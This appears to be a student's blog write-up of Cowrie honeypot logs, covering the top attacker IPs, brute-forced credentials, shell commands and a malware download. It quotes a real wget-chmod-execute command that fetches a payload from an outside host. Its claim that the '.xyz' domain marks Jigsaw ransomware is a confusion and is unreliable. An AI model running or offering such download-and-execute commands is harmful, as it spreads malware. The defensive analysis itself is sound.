What is a honeypot?
You might think of the Disney character Winnie the Pooh eating honey out of a honeypot. However, a honeypot means something different in the cybersecurity world. A honeypot observe and analyze what malicious activity occurred in a controlled and safe environment. Some honeypots attract and trap malicious attacks such as email traps and database traps. Honeypots are a valuable tool in cybersecurity because it allows cybersecurity professionals to learn about vulnerabilities and potential threats in a system. In this article, the focus will be on the honeypot: Cowrie.
Cowrie is a medium to highly interactive SSH and Telnet honeypot designed to record attacks performed by attackers on ports 22 and 23. The honeypot acts as an SSH server with weak login credentials. Once the attacker logins into the honeypot, they have access to a fake shell to execute commands.
For my final project, I used an AWS TPOT web interface to analyze malicious activity on the honeypot: Cowrie for a period of 1 day 8 hours (Oct 18, 2021 @ 10:00 to Oct 19, 2021@ 18:00) using a Debian EC2 instance located in Northern Virginia.
Here are my findings:
Using Kabana to filter the data, the top attacker on this honeypot is the source IP address:78.110.67.48. The talointelligence webpage displays that this IP address is located in Manama, Bahrain, and is owned by LightSpeed Communications seen in Figure 2.
Next, I used the website IPvoid.com and found the following information: the address of the building, a name associated with the company, and a phone number seen in Figure 3.
Then, I used the website: brightcloud.com for threat analysis and found out this IP address threat status is benign. Interesting right?
Therefore, I search for LightSpeed Communication W.L.L on google. I found the following info about the company. The company has a website, the ownership status is acquired/merged, and the company provides internet service seen in Figure 6. I clicked on the link associated with this company. The link loads to the login page seen in Figure 7.
There are two different names associated with the company seen in Figure 8. I searched for the name of the Founder & Vice Chairman of the company and found an article talking about the company in 2007 (https://www.arabianbusiness.com/light-years-ahead-213242.html). I could not find anything about the name associated with LightSpeed Communication W.L.L seen in Figure 3. However, I found another website that states that LightSpeed Communication W.L.L dissolved seen in Figure 9.
Next, I analyze the username and passwords that attackers used to gain access to the Cowrie Honeypot. The results show that the most used username was root and the most used passwords were 1 and1qazXSW@. I made a horizontal stacked bar graph to visually show the top usernames and passwords seen in Figure 11.
Now, it is time to analyze the attempted malicious activity on this honeypot.
Command-line Analysis
In Figure 1, the top attacker with the most activity on the honeypot was the IP address: 78.110.67.48. Therefore, I filtered the information to only show this IP address. This IP address uses the following commands shown seen in Figure 12.
First, the attacker tries to enable the shell built-in command and uses the command system to pass commands to a Unix shell. Second, the attacker tries to find information about the kernel data structure using the command cat /proc/mounts and installs Busybox HDKTE, a Swiss Amry Knife tool in Linux. Third, the attacker moves to a temporary file labeled shm and rename the folder /bin/echo to the folder, .s. Then, the attacker tries to transfer using the command TFTP and retrieve a file using a wget. Fourth, the attackers appends the command:dd bs=52 count=1 if=.s || while read i ; do echo $i; done into the .s folder. This command looks like a digital forensic command. Finally, the file .s is deleted and exits the shell.
However, this IP address did not upload a file on this honeypot.
Malware Analysis
After the command-line analysis, I look at the malicious downloads on Cowrie Honeypot. The downloaded files were from the following IP addresses: 13.89.59.109, 68.183.180.46, 40.86.1.181 seen in Figure 13. In this section, the focus will be on the IP address 13.89.59.109.
The IP address: 13.89.59.109 tried to upload an exploit on the honeypot. The command was wget drip-project.xyz/x86_64; chmod 777 *; ./x86_64 drip_payload seen in Figure 14.
First, I pasted the hash on the website virustotal and it indicated that this hash was malicious.
Next, I analyzed each part of the command. The first section of the command was wget drip-project.xyz/x86_64. The Linux command,wget, is used to retrieve files over the internet. The file (exploit)is drip-project.xyz and x86_64 refers to 64-bit software.
Upon further investigation, I found out that the extension .xyz is Jigsaw ransomware. Jigsaw ransomware encrypts various files stored on victims’ computers via asymmetric cryptography. If the encryption is successful, then .xyz ransomware opens a window that contains a ransom-demand message. The message informs victims of the encryption and demands a ransom payment to restore the files. It states that several files are deleted every 60 minutes. Finally, the website, virustotal.com, verifies that the file is malicious seen in Figure 16.
The second part of the command is chmod 777*. Chmod is a Linux command used to change permissions on a file and setting 777 permission to a file makes the file readable, writable, and executable by all users. Finally, the last part of the command is ./x86_64 drip_payload. The program was executed on the system.
I tried to retrieve this exploit onto my virtual machine (SIFT Workstation). However, the file was unable to retrieve it from the host seen in Figure 17.
Therefore, I used the following websites: abusedpIP.com and brightcloud.com to investigate this IP address. I found out the following for this IP address: the network owner is a Microsoft corporation, it is associated with Data/Center/Web Hosting/Transit, and is reported as a threat seen in Figures 18 and 19. However, I could not find a website to the business or a name associated with this IP address.
Conclusion
This is a perfect example of what cybersecurity professionals do on a daily basis. They investigate incidents and tried to find the story in order to find the reason behind the attack. What is the main goal? In this project, the story was about hackers from all over the worldwide trying to either break the honeypot by using various exploits. After they have identified the threat, cybersecurity professionals analyze the threat aka Indicator of compromise (IOC) by using various cybersecurity tools such as virus total and using websites to lookup IP addresses. In this project, I have done command-line analysis, malware analysis, and IP location analysis. Finally, they use this information to create policies, guidelines, procedures in their organization to build and improve their cybersecurity system. In this project, I would have recommended closing insecure ports, updating password policies, set up IDS/IPS to detect IP addresses not belonging to the network, etc. The possibilities are endless. Malicious attacks are inevitable in any system. The main objective of cybersecurity professional is to learn, prepare, defend, and recover against possible malicious attacks.
